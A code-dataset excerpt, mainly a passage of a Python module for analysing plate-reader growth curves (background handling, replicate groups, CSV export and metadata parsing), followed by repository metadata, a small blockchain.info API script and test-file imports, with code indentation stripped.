if self.replicateGroups is not None:
for tc in self.replicateGroups:
tc._setBackgroundIndex(None)
self._setBackgroundStatus()
return
if len(backgroundSampleIds) > 1:
raise Plate.MultipleBackgroundIdsError(backgroundSampleIds)
backgroundSampleId=backgroundSampleIds[0]
if self._sampleConditionToReplicateGroupIdcs is None:
self._createSampleConditionToReplicateGroupIndices()
# set background index for the single (non-averaged) wells
for tc in self.wells:
if tc.sampleid not in backgroundSampleIds:
if tc.condition in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId]:
# NOTE there should be only one element in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition]
tc._setBackgroundIndex(self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition][0])
# set background for replicate groups
for tc in self.replicateGroups:
if tc.sampleid not in backgroundSampleIds:
if tc.condition in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId]:
# NOTE there should be only one element in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition]
tc._setBackgroundIndex(self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition][0])
# append warnings to self._loadStatus if for some replicates no background was set
self._setBackgroundStatus()
def replicateGroupIdxForSampleCondition(self,sampleid,condition):
"""
Return index of replicate group with the given sample Id and condition.
:param sampleid: Id of the sample.
:type sampleid: string
:param condition: Condition under which the sample was grown.
:type condition: string
:return: int -- Index (into self.replicateGroups) of Replicate with given id and condition.
"""
if self._sampleConditionToReplicateGroupIdcs is None:
self._createSampleConditionToReplicateGroupIndices()
if sampleid not in self._sampleConditionToReplicateGroupIdcs:
return None
if condition not in self._sampleConditionToReplicateGroupIdcs[sampleid]:
return None
if len(self._sampleConditionToReplicateGroupIdcs[sampleid][condition]) != 1:
raise RuntimeError('more than one replicate group for '+sampleid+' '+condition)
return self._sampleConditionToReplicateGroupIdcs[sampleid][condition][0]
def replicateGroupForSampleCondition(self,sampleid,condition):
"""
Return index of replicate group with the given sample Id and condition.
:param sampleid: Id of the sample.
:type sampleid: string
:param condition: Condition under which the sample was grown.
:type condition: string
:return: Replicate -- replicate group with given id and condition.
"""
idx=self.replicateGroupIdxForSampleCondition(sampleid,condition)
if idx is None:
return None
return self.replicateGroups[idx]
def replicateGroupIdcsForCondition(self,condition):
"""
Return a list of indices of replicate groups with the given condition.
:param condition: Condition under which the samples were grown.
:type condition: string
:return: list(int) -- Indices (into self.replicateGroups) of replicate groups with the given condition.
"""
if self._conditionToReplicateGroupIdx is None:
self._createConditionToReplicateGroupIndices()
if condition not in self._conditionToReplicateGroupIdx:
return None
return self._conditionToReplicateGroupIdx[condition]
def replicateGroupsForCondition(self,condition):
"""
Return a list of replicate groups with the given condition.
:param condition: Condition under which the samples were grown.
:type condition: string
:return: list(Replicate) -- Replicate groups with given condition.
"""
idcs=self.replicateGroupIdcsForCondition(condition)
if idcs is None:
return None
tcs=[]
for idx in idcs:
tcs.append(self.replicateGroups[idx])
return tcs
def conditions(self):
"""
Return a list of conditions.
:return: list(str) -- Conditions.
"""
if self._conditionToReplicateGroupIdx is None:
self._createConditionToReplicateGroupIndices()
conditions=list(self._conditionToReplicateGroupIdx.keys())
conditions.sort()
return conditions
def nonBackgroundReplicates(self):
"""
:return: list(Replicate) -- replicate groups that are not background samples.
"""
backgroundIndices=self.backgroundReplicateGroupIndices()
nbckg=[]
idx=0
for tc in self.replicateGroups:
if idx not in backgroundIndices:
nbckg.append(tc)
idx+=1
return nbckg
def nonBackgroundReplicateIndices(self):
"""
:return: list(Replicate) -- Indices of replicate groups that are not background samples.
"""
backgroundIndices=self.backgroundReplicateGroupIndices()
nbckgidcs=[]
idx=0
for tc in self.replicateGroups:
if idx not in backgroundIndices:
nbckgidcs.append(idx)
idx+=1
return nbckgidcs
def nonBackgroundWells(self):
"""
:return: list(Replicate) -- wells that are not background samples.
"""
backgroundIndices=self.backgroundWellIndices()
nbckg=[]
idx=0
for tc in self.wells:
if idx not in backgroundIndices:
nbckg.append(tc)
idx+=1
return nbckg
def _indexOfReplicateGroup(self,ctc):
"""
Determine the index of the given replicate group.
For internal use only.
:return: int -- Index of replicate group.
"""
if self.replicateGroups is None:
return None
idx=0
idxOfTc=None
for ttc in self.replicateGroups:
if ttc._wellIndices == ctc._wellIndices:
if idxOfTc is not None:
raise RuntimeError("multiple similar replicate groups?")
else:
idxOfTc=idx
idx+=1
return idxOfTc
def _parametersUpdated(self,par=None):
"""
Notify replicate(s) that a parameter changed and memoised results should be deleted.
For internal use only.
:param par: The name of the parameter that was changed.
:type par: str
The Replicate objects memoise some results that are expensive
to calculate. When a parameter is updated, the results may not
be valid anymore and should get removed from the "cache".
If par is given, this method can decide which results should
be removed.
"""
# only needed for non-background replicate groups (as background does not depend on parameters)
for tc in self.nonBackgroundWells():
tc._parametersUpdated(par,dontRecurse=True)
for tc in self.nonBackgroundReplicates():
tc._parametersUpdated(par,dontRecurse=True)
self.modified=True
def _replicateChanged(self,tc,par=None):
"""
Update replicates that depend on the given replicate.
For internal use only.
"""
if self.replicateGroups is None:
# for startup code: there are no replicate groups yet
return
idxOfTc=self._indexOfReplicateGroup(tc)
if idxOfTc is None:
raise RuntimeError("no matching tc for "+tc.fullId())
for ptc in self.wells:
if ptc._backgroundIndex == idxOfTc:
ptc._parametersUpdated(par='backgroundRawOd')
for ctc in self.replicateGroups:
if ctc._backgroundIndex == idxOfTc:
ctc._parametersUpdated(par='backgroundRawOd')
def _getDefaultParameter(self,par):
"""
Get default value of parameter.
For internal use only.
:param par: The name of the parameter.
:type par: str
The Plate stores values of plate-wide parameters
and default parameters.
"""
if par not in self._inheritableParameters:
raise RuntimeError('_getDefaultParameter: unknown parameter '+par)
return self._inheritableParameters[par]
def _getExplicitParameter(self,par):
"""
Get explicit value of parameter (alias for _getDefaultParameter).
For internal use only.
:param par: The name of the parameter.
:type par: str
"""
return self._getDefaultParameter(par)
def getParameter(self,par):
"""
Return the requested parameter.
:param par: The name of the parameter.
:type par: str
If the parameter is explicitly set for the plate, this value
returned. Otherwise return None.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
return self._getDefaultParameter(par)
def parameterIsEditible(self,par):
"""
Return True if this is a parameter can have a plate-wide default.
:return: bool -- True if parameter can be edited.
Some parameters can only be changed per Replicate, some only
per Plate. This method is used to distinguish between them.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
if par in Plate._isNotPlateParameter and Plate._isNotPlateParameter[par]:
return False
if par not in self._inheritableParameters:
raise RuntimeError("parameterIsEditible: unknown parameter "+par)
return True
def parameterIsExplicitlySet(self,par):
"""
Return True if this is parameter is explicitly set.
:param par: The name of the parameter.
:type par: str
:return: bool -- True if parameter is explicitly set.
If a parameter is explicitly set for a replicate it overrides
an inherited value. This method is used to tell whether this
is the case. Since this object is a plate it tells whether a
default value has been set.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
return self._getExplicitParameter(par) is not None
def activeChildReplicatesHaveExplicitParameter(self,par):
"""
Return True if for at least one of the replicate groups the given parameter is explicitly set.
:param par: The name of the parameter.
:type par: str
:return: bool -- True if parameter is explicitly set in one of the replicate groups.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
for childtc in self.nonBackgroundReplicates():
if childtc._getExplicitParameter(par) is not None:
return True
if childtc.activeChildReplicatesHaveExplicitParameter(par):
return True
return False
def _setDefaultParameter(self,par,val):
"""
Change the (default) value of the given parameter.
For internal use only.
:param par: The name of the parameter that will be changed.
:type par: str
:param val: The new value.
"""
if par not in self._inheritableParameters:
raise RuntimeError('_setDefaultParameter: unknown parameter '+par)
self._inheritableParameters[par]=val
self._parametersUpdated(par)
def _setExplicitParameter(self,par,val):
"""
Change the value of the given parameter (alias for _setDefaultParameter).
For internal use only.
:param par: The name of the parameter that will be changed.
:type par: str
:param val: The new value.
"""
self._setDefaultParameter(par,val)
def setMaxGrowthLowerTimeCutoff(self,t):
"""Set lower limit of interval in which the maximal growth should be searched."""
self._setDefaultParameter('maxGrowthLowerTimeCutoff',t)
def setMaxGrowthUpperTimeCutoff(self,t):
"""Set upper limit of interval in which the maximal growth should be searched."""
self._setDefaultParameter('maxGrowthUpperTimeCutoff',t)
def setLogOdCutoff(self,lod):
"""Set cutoff value of log(OD)."""
self._setDefaultParameter('logOdCutoff',lod)
def setLagAtLogOdEquals(self,lagat):
"""Set value of log(OD) used to define the lag time."""
self._setDefaultParameter('lagAtLogOdEquals',lagat)
def setHighDensityCorrectionLinear(self,hdCorrectionLinear=None):
"""Set coefficient of linear term of high density correction."""
self._setDefaultParameter('hdCorrectionLinear',hdCorrectionLinear)
def setHighDensityCorrectionQuadratic(self,hdCorrectionQuadratic=None):
"""Set coefficient of quadratic term of high density correction."""
self._setDefaultParameter('hdCorrectionQuadratic',hdCorrectionQuadratic)
def setHighDensityCorrectionCubic(self,hdCorrectionCubic=None):
"""Set coefficient of cubic term of high density correction."""
self._setDefaultParameter('hdCorrectionCubic',hdCorrectionCubic)
def setSmoothingK(self,k):
"""Set degree of the smoothing spline."""
self._setDefaultParameter('smoothingK',k)
def setSmoothingS(self,s):
"""Set smoothing factor used to choose the number of knots."""
self._setDefaultParameter('smoothingS',s)
def setSlidingWindowSize(self,win):
"""
Set number of datapoints of sliding windows.
The value that is used for local exponential fit (growth rate) and linear regression (growth yield).
"""
self._setDefaultParameter('slidingWindowSize',win)
@staticmethod
def guessWellIds(numberOfWells):
"""
Return well ids by guessing the plate layout based on number of wells.
This function will return A1-P24 or A1-H12.
:param numberOfWells: number of wells of the plate
:type numberOfWells: int
:return: list(str) -- the guessed well ids (None if layout could not be guessed)
"""
# some "heuristics" about well ids: A1-P24 or A1-H12
if numberOfWells == 384:
labeldivisor=24
elif numberOfWells == 96:
labeldivisor=12
else:
return None
rowlabels=[chr(x) for x in range(ord('A'), ord('P') + 1)]
wellids=[]
for i in range(numberOfWells):
(lblchar,lblnum)=divmod(i, labeldivisor)
wellids.append(str(rowlabels[lblchar])+str(lblnum+1))
return wellids
@staticmethod
def availableColumnsForCsvExport(logOdDerivativeProperties=True):
"""
List the available properties that can be chosen for csv export.
:param logOdDerivativeProperties: include properties determined from log(OD) derivative
:type logOdDerivativeProperties: bool
:return: list(str), list(str) -- fixed columns (ids), properties
The 'fixed columns' list contains the sample/condition tuples
which should always be exported in order to identify the
replicates. For the other properties (except 'wellids') the
variance can be chosen by adding '_var' to the property name.
"""
fixedcolumns=['sample','condition']
columns=[]
columns.extend(['slope_linear',
'intercept_linear',
'timeOfMax_linear',
'lag_linear'])
columns.extend(['doublingtime_expfit',
'growthrate_expfit',
'od0_expfit',
'timeOfMax_expfit',
'lag_expfit'])
if logOdDerivativeProperties:
columns.extend(['doublingtime_local',
'growthrate_local',
'od0_local',
'timeOfMax_local',
'lag_local'])
columns.extend(['yield',
'timeOfYield'])
columns.extend(['wellids'])
return fixedcolumns, columns
def growthParametersToCsv(self,filename,addVarianceColumns=True,singleWells=False, columns=None, progressCall=None,
**csvkwargs):
"""
Write a "comma seperated values" (csv) file of properties for all replicate groups.
:param filename: Filename.
:type filename: string
:param columns: List of properties that shall get exported (in that order).
:type columns: list(str)
:param addVarianceColumns: For each entry in columns add the corresponding variance
:type addVarianceColumns: bool
:param singleWells: Export properties of single well replicates instead of replicate groups
:type singleWells: bool
:param progressCall: Function that will be called on each iteration.
:type progressCall: @fun(int)
:param csvkwargs: Parameters which are passed on to the csv module; defaults to { 'dialect': 'excel' }
:type csvkwargs: dict()
"""
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
col2collabel={
'lag_expfit': 'lag_expfit (ln(OD) == lagAtCutoff)',
'lag_expfit_var': 'lag_expfit_var (ln(OD) == lagAtCutoff)',
'lag_local': 'lag_local (ln(OD) == lagAtCutoff)',
'lag_local_var': 'lag_local_var (ln(OD) == lagAtCutoff)',
}
if columns is None:
columns, morecolumns=Plate.availableColumnsForCsvExport()
columns.extend(morecolumns)
if addVarianceColumns and not singleWells:
newcolums=[]
for col in columns:
newcolums.append(col)
if col in ['sample','condition','wellids']:
continue
if not col.endswith('_var') and col+'_var' not in columns:
newcolums.append(col+'_var')
columns=newcolums
if singleWells:
replicates=self.nonBackgroundWells()
else:
replicates=self.nonBackgroundReplicates()
with CsvFileUnicodeWriter(filename,**csvkwargs) as sliwriter:
descrow=[]
for col in columns:
if col in col2collabel:
descrow.append(col2collabel[col])
else:
descrow.append(col)
sliwriter.writerow(descrow)
allcnt=-1
for tc in replicates:
allcnt+=1
if progressCall is not None:
progressCall(allcnt)
if tc.od() is not None:
doublingtime_ef=None
doublingtimevar_ef=None
doublingtime_nls=None
doublingtimevar_nls=None
lag_linear=None
lagVar_linear=None
mu_ef, mu_ef_var, od0_ef, od0_ef_var, maxt_ef, maxt_ef_var, lag_ef, lag_ef_var, method_ef, status = tc.maxGrowthrate()
mu_nls, mu_nls_var, od0_nls, od0_nls_var, maxt_nls, maxt_nls_var, lag_nls, lag_nls_var, method_nls, status = tc.maxGrowthrateFromLogOdDerivative()
growthyield, growthyield_var, tgrowthyield, tgrowthyield_var, status=tc.growthyield()
slope_linear, slopeVar_linear, intercept_linear, interceptVar_linear, timeOfMax_linear, timeOfMaxVar_linear, timeOfMaxIndices_linear, plainSlopeStatus=tc.odSlopemaxIntercept()
doublingtime_ef, doublingtimevar_ef=Replicate.growthrateToDoublingTime(mu_ef,mu_ef_var)
doublingtime_nls, doublingtimevar_nls=Replicate.growthrateToDoublingTime(mu_nls,mu_nls_var)
if slope_linear is not None and slope_linear != 0:
lag_linear=-intercept_linear/(slope_linear)
if slopeVar_linear is not None and interceptVar_linear is not None:
lagVar_linear=((intercept_linear/(slope_linear**2))**2 * slopeVar_linear +
1/slope_linear**2 * interceptVar_linear)
else:
(doublingtime_ef, doublingtimevar_ef, doublingtime_nls, doublingtimevar_nls)=(None,None,None,None)
(mu_ef, mu_ef_var, od0_ef, od0_ef_var, maxt_ef, maxt_ef_var, lag_ef, lag_ef_var)=([None,None,None,None,None,None,None,None])
(mu_nls, mu_nls_var, od0_nls, od0_nls_var, maxt_nls, maxt_nls_var, lag_nls, lag_nls_var)=([None,None,None,None,None,None,None,None])
(growthyield,growthyield_var,tgrowthyield,tgrowthyield_var)=([None,None,None,None])
(slope_linear, slopeVar_linear, intercept_linear, interceptVar_linear,
timeOfMax_linear, timeOfMaxVar_linear, lag_linear, lagVar_linear)=([None,None,None,None,None,None,None,None])
thisrow=[]
for col in columns:
if col == 'sample':
thisrow.append(tc.sampleid)
elif col == 'condition':
thisrow.append(tc.condition)
elif col == 'slope_linear':
thisrow.append(slope_linear)
elif col == 'slope_linear_var':
thisrow.append(slopeVar_linear)
elif col == 'intercept_linear':
thisrow.append(intercept_linear)
elif col == 'intercept_linear_var':
thisrow.append(interceptVar_linear)
elif col == 'timeOfMax_linear':
thisrow.append(timeOfMax_linear)
elif col == 'timeOfMax_linear_var':
thisrow.append(timeOfMaxVar_linear)
elif col == 'lag_linear':
thisrow.append(lag_linear)
elif col == 'lag_linear_var':
thisrow.append(lagVar_linear)
elif col == 'doublingtime_expfit':
thisrow.append(doublingtime_ef)
elif col == 'doublingtime_expfit_var':
thisrow.append(doublingtimevar_ef)
elif col == 'growthrate_expfit':
thisrow.append(mu_ef)
elif col == 'growthrate_expfit_var':
thisrow.append(mu_ef_var)
elif col == 'od0_expfit':
thisrow.append(od0_ef)
elif col == 'od0_expfit_var':
thisrow.append(od0_ef_var)
elif col == 'timeOfMax_expfit':
thisrow.append(maxt_ef)
elif col == 'timeOfMax_expfit_var':
thisrow.append(maxt_ef_var)
elif col == 'lag_expfit':
thisrow.append(lag_ef)
elif col == 'lag_expfit_var':
thisrow.append(lag_ef_var)
elif col == 'doublingtime_local':
thisrow.append(doublingtime_nls)
elif col == 'doublingtime_local_var':
thisrow.append(doublingtimevar_nls)
elif col == 'growthrate_local':
thisrow.append(mu_nls)
elif col == 'growthrate_local_var':
thisrow.append(mu_nls_var)
elif col == 'od0_local':
thisrow.append(od0_nls)
elif col == 'od0_local_var':
thisrow.append(od0_nls_var)
elif col == 'timeOfMax_local':
thisrow.append(maxt_nls)
elif col == 'timeOfMax_local_var':
thisrow.append(maxt_nls_var)
elif col == 'lag_local':
thisrow.append(lag_nls)
elif col == 'lag_local_var':
thisrow.append(lag_nls_var)
elif col == 'yield':
thisrow.append(growthyield)
elif col == 'yield_var':
thisrow.append(growthyield_var)
elif col == 'timeOfYield':
thisrow.append(tgrowthyield)
elif col == 'timeOfYield_var':
thisrow.append(tgrowthyield_var)
elif col == 'wellids':
thisrow.append(tc.activeChildWellIdStr())
else:
raise RuntimeError('unknown property '+col)
sliwriter.writerow(thisrow)
def timeseriesToCsv(self,filename,
addVarianceColumns=True,
singleWells=False,
columns=None,
fullId=False,
progressCall=None,
**csvkwargs):
"""
Write a "comma seperated values" (csv) file of time series for all replicate groups.
:param filename: Filename.
:type filename: string
:param columns: List of time series that shall get exported for each replicate.
:type columns: list(str)
:param addVarianceColumns: For each entry in columns add the corresponding variance
:type addVarianceColumns: bool
:param singleWells: Export time series of single well replicates instead of replicate groups
:type singleWells: bool
:param fullId: Label the columns with the full id (including well ids) instead of "sample condition"
:type fullId: bool
:param progressCall: Function that will be called on each iteration.
:type progressCall: @fun(int)
:param csvkwargs: Parameters which are passed on to the csv module; defaults to { 'dialect': 'excel' }
:type csvkwargs: dict()
"""
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
col2collabel={
'od': 'OD',
'od_var': 'var(OD)',
'lnod': 'ln(OD)',
}
if columns is None:
columns=['od']
if addVarianceColumns and not singleWells:
newcolums=[]
for col in columns:
newcolums.append(col)
if col in ['lnod']:
continue
if not col.endswith('_var') and col+'_var' not in columns:
newcolums.append(col+'_var')
columns=newcolums
if singleWells:
replicates=self.nonBackgroundWells()
else:
replicates=self.nonBackgroundReplicates()
with CsvFileUnicodeWriter(filename,**csvkwargs) as sliwriter:
# header
descrow=['t']
for tc in replicates:
for col in columns:
if col in col2collabel:
lbl=col2collabel[col]
else:
lbl=col
if fullId:
lbl+=' '+tc.fullId()
else:
lbl+=' '+tc.sampleid+' '+tc.condition
if singleWells:
lbl+=' '+tc.activeChildWellIdStr()
descrow.append(lbl)
sliwriter.writerow(descrow)
# data
allcnt=-1
for ti in range(len(self.time)):
allcnt+=1
if progressCall is not None:
progressCall(allcnt)
thisrow=[]
thisrow.append(self.time[ti])
for tc in replicates:
for col in columns:
if col == 'od':
if tc.od() is not None:
thisrow.append(tc.od()[ti])
else:
thisrow.append(None)
elif col == 'od_var':
if tc.odVar() is not None:
thisrow.append(tc.odVar()[ti])
else:
thisrow.append(None)
elif col == 'lnod':
if tc.logOd() is not None:
thisrow.append(tc.logOd()[ti])
else:
thisrow.append(None)
else:
raise RuntimeError('unknown property '+col)
sliwriter.writerow(thisrow)
@staticmethod
def _numWellsToFormatString(numWells):
"""
Return a string uniquely identifying a plate format.
NOTE this function is subject to change.
"""
if numWells == 100:
return '100honeycomb'
elif numWells == 200:
return '200honeycomb'
return str(numWells)
@staticmethod
def writeMetadata(filename,metadata,metadataKeys,plateformat='96',**csvkwargs):
"""
:param metadata: the metadata
:type metadata: list(dict)
"""
columnMajorOrder=False
if plateformat == '96':
if len(metadata) != 96:
raise RuntimeError('metadata is not of length 96')
numcols=12
numrows=8
elif plateformat == '384':
if len(metadata) != 384:
raise RuntimeError('metadata is not of length 384')
numcols=24
numrows=16
elif plateformat == '200honeycomb':
if len(metadata) != 200:
raise RuntimeError('metadata is not of length 200')
columnMajorOrder=True
numcols=20 # number of columns in the layout of the exported metadata
numrows=10 # number of rows
if plateformat == '96' or plateformat == '384':
rowlabels=[chr(x) for x in range(ord('A'), ord('A') + numrows)]
collabels=[str(i+1) for i in range(numcols)]
elif plateformat == '200honeycomb':
rowlabels=[str(i) for i in range(1,numrows+1)]
collabels=[str(i+1) for i in range(0,len(metadata),numrows)]
else:
raise RuntimeError('not implemented for format other than 96, 384 or 200 honeycomb')
if columnMajorOrder:
reordered=[]
# transpose
for rowidx in range(numrows):
for colidx in range(numcols):
metentryidx=rowidx + colidx * numrows
reordered.append(metadata[metentryidx])
else:
reordered=metadata # keep order
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
with CsvFileUnicodeWriter(filename,**csvkwargs) as writer:
# header: just the name of the metadata
for key in metadataKeys:
row=[key]
writer.writerow(row)
# the column ids
row=['<>']
row.extend(collabels)
writer.writerow(row)
# now the data, divided into rows of numcols columns
colit=reordered.__iter__()
for rowlab in rowlabels:
row=[rowlab]
for j in range(numcols):
thismeta=next(colit)
val=thismeta[key] if key in thismeta else None
row.append(val)
writer.writerow(row)
# an empty row
row=[]
writer.writerow(row)
@staticmethod
def readMetadata(filename,plateformat='96',**csvkwargs):
"""
Read metadata from a csv file.
For each metadata key a table is read. The table should be laid
out as according to the plate layout. To get a template, call
writeMetadata(outfile,[{} for i in range(numOfColumns)],Plate.metadataKeys)
"""
columnMajorOrder=False
if plateformat == '96':
numcols=12
numrows=8
elif plateformat == '384':
numcols=24
numrows=16
elif plateformat == '200honeycomb':
columnMajorOrder=True
numcols=20 # number of columns in the layout of the exported metadata
numrows=10 # number of rows
if plateformat == '96' or plateformat == '384':
rowlabels=[chr(x) for x in range(ord('A'), ord('A') + numrows)]
collabels=[str(i+1) for i in range(numcols)]
elif plateformat == '200honeycomb':
rowlabels=[str(i) for i in range(1,numrows+1)]
collabels=[str(i+1) for i in range(0,numcols*numrows,numrows)]
else:
raise RuntimeError('not implemented for format other than 96, 384 or 200 honeycomb')
# initialise the metadata list
metadata=[{} for i in range(numcols*numrows)]
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
with CsvFileUnicodeReader(filename,**csvkwargs) as odreader:
nextlinemode='nada'
metkey=None
lineno=0
for row in odreader:
lineno+=1
if nextlinemode == 'nada':
if len(row) == 0 or row[0] == '':
# skip empty row
continue
else:
metkey=row[0]
nextlinemode='starttable'
elif nextlinemode == 'starttable':
if len(row) == 0:
raise Plate.BadMetadata('Row at start of table is empty',lineno,filename=filename)
if row[0] != '<>' or row[1] != '1' or len(row) != numcols+1:
raise Plate.BadMetadata('This does not look like the beginning of a table'+
', expected row[0] == "<>", row[1] == "1" and len(row) == '+str(numcols+1)+
', but got row[0]=="'+str(row[0])+'", row[1] == "'+str(row[1])+
'" and len(row) == '+str(len(row)),
lineno,filename=filename)
nextlinemode='intable'
rowcnt=0
metit=metadata.__iter__()
elif nextlinemode == 'intable':
rowcnt+=1
if len(row) == 0:
raise Plate.BadMetadata('Row '+str(rowcnt)+' is empty',lineno,filename=filename)
if row[0].upper() != rowlabels[rowcnt-1]:
raise Plate.BadMetadata('Row '+str(rowcnt)+' does not start with '+rowlabels[rowcnt-1]+
' (found "'+row[0].upper()+'")',lineno,filename=filename)
row.pop(0)
numOfValsThisRow=len(row)
if numOfValsThisRow > numcols:
numOfValsThisRow=numcols
# read the columns of this row
colit=row.__iter__()
for i in range(numOfValsThisRow):
val=next(colit)
if val == '':
# map empty sting to None
val=None
metentry=next(metit)
metentry[metkey]=val
# if the last columns are empty, fill them up with None
for i in range(numcols-numOfValsThisRow):
metentry=next(metit)
metentry[metkey]=None
if rowcnt == numrows:
nextlinemode='nada'
if columnMajorOrder:
reordered=[]
for colidx in range(numcols):
for rowidx in range(numrows):
metentryidx=rowidx * numcols + colidx
reordered.append(metadata[metentryidx])
metadata=reordered
return metadata
class Error(Exception):
"""Base class for exceptions in this module."""
pass
class MultipleBackgroundIdsError(Error):
"""Exception raised if there are different IDs for background wells."""
def __init__(self, backgroundSampleIds):
self._backgroundSampleIds = backgroundSampleIds
def __str__(self):
return str('multiple keys were found that could be background (blank) samples, make sure there is only one.' +
'\nThe keys are:\n'+str(self._backgroundSampleIds))
class UnknownFileFormat(Error):
"""Exception raised when an unsupported serialisation format is opened."""
def __init__(self,filename,serFormat=None,serFormatVersion=None,detailedError=None):
self.filename = filename
self.serFormat = serFormat
self.serFormatVersion = serFormatVersion
self.detailedError = detailedError
def __str__(self):
if self.serFormat is not None:
if self.serFormat.startswith('clsplates'):
message= 'You tried to open a Chronological Life Span (CLS) file ("'+self.filename+'"), please use the CLS analyser for this'
else:
message = 'Unsupported file format "'+self.serFormat+'"'
if self.serFormatVersion is not None:
message += ' version "'+self.serFormatVersion+'"'
message += ' in file "'+self.filename+'"'
else:
message = 'Unsupported file format in file "'+self.filename+'"'
if self.detailedError is not None:
message+=': '+self.detailedError+'.'
else:
message+='.'
return message
class BadMetadata(Error):
"""Exception raised when an unsupported serialisation format is opened."""
def __init__(self,detailedError=None,lineno=None,filename=None):
self.detailedError = detailedError
self.filename = filename
self.lineno = lineno
def __str__(self):
message = self.detailedError
if self.lineno is not None:
message += ' around line '+str(self.lineno)
if self.filename is not None:
message += ' in file '+str(self.filename)
return message
|
platereader/gathode
|
platereader/plate.py
|
plate.py
|
py
| 71,939 |
python
|
en
|
code
| 4 |
github-code
|
6
|
[
{
"api_name": "platereader.parser.modulenameToModule",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "platereader.parser",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "platereader.parser.getModulesOfNamespace",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "platereader.parser",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "os.path.path.exists",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "os.path.path",
"line_number": 83,
"usage_type": "attribute"
},
{
"api_name": "os.path",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "bz2.BZ2File",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 169,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 176,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 182,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "os.path.path.splitext",
"line_number": 260,
"usage_type": "call"
},
{
"api_name": "os.path.path",
"line_number": 260,
"usage_type": "attribute"
},
{
"api_name": "os.path",
"line_number": 260,
"usage_type": "name"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.warning",
"line_number": 266,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 266,
"usage_type": "name"
},
{
"api_name": "json.dumps",
"line_number": 268,
"usage_type": "call"
},
{
"api_name": "bz2.BZ2File",
"line_number": 269,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 349,
"usage_type": "argument"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 475,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 497,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.failed",
"line_number": 501,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 501,
"usage_type": "name"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 508,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.failed",
"line_number": 512,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 512,
"usage_type": "name"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 514,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 620,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.warning",
"line_number": 624,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 624,
"usage_type": "name"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 656,
"usage_type": "call"
},
{
"api_name": "platereader.statusmessage.Severity.warning",
"line_number": 661,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.Severity",
"line_number": 661,
"usage_type": "name"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 746,
"usage_type": "call"
},
{
"api_name": "platereader.csvunicode.CsvFileUnicodeWriter",
"line_number": 1295,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate.growthrateToDoublingTime",
"line_number": 1321,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 1321,
"usage_type": "name"
},
{
"api_name": "platereader.replicate.Replicate.growthrateToDoublingTime",
"line_number": 1322,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 1322,
"usage_type": "name"
},
{
"api_name": "platereader.csvunicode.CsvFileUnicodeWriter",
"line_number": 1461,
"usage_type": "call"
},
{
"api_name": "platereader.csvunicode.CsvFileUnicodeWriter",
"line_number": 1565,
"usage_type": "call"
},
{
"api_name": "platereader.csvunicode.CsvFileUnicodeReader",
"line_number": 1621,
"usage_type": "call"
}
] |
19637644362
|
import requests
import datetime
response = requests.get("https://blockchain.info/rawaddr/42e58ccd620fab780e46095f4b3f6987aa253219")
data = response.json()
first_tr_id = data["txs"][0]["hash"]
first_tr_time = data["txs"][0]["time"]
a = [1, 2, 3, 4]
for n in range(len(a)):
print(a[n])
|
maciek1066/training
|
bitcoin_api.py
|
bitcoin_api.py
|
py
| 294 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 4,
"usage_type": "call"
}
] |
30614657486
|
from unittest import main
from re import compile
from ir_datasets.formats import ToucheQuery, TrecQrel, ToucheTitleQuery
